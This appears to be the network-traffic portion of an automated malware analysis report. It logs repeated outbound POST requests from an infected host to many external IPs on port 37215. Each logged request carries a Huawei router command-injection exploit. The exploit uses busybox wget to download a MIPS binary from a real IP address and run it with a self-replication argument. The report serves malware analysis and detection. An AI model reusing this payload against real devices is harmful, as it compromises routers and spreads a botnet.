                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          783192.168.2.2348576197.218.172.18537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.233082056 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          784192.168.2.2348982157.160.91.16137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.233122110 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          785192.168.2.234568041.41.101.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.233125925 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          786192.168.2.2357728204.72.58.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.233464956 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          787192.168.2.2358452197.192.120.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.234026909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          788192.168.2.2341890177.92.172.11537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.234066010 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          789192.168.2.2360050175.158.136.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.234102011 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          790192.168.2.235481441.62.195.22837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.234555006 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          791192.168.2.2355340157.40.201.23437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.234606028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          792192.168.2.2336818197.229.215.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.234644890 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
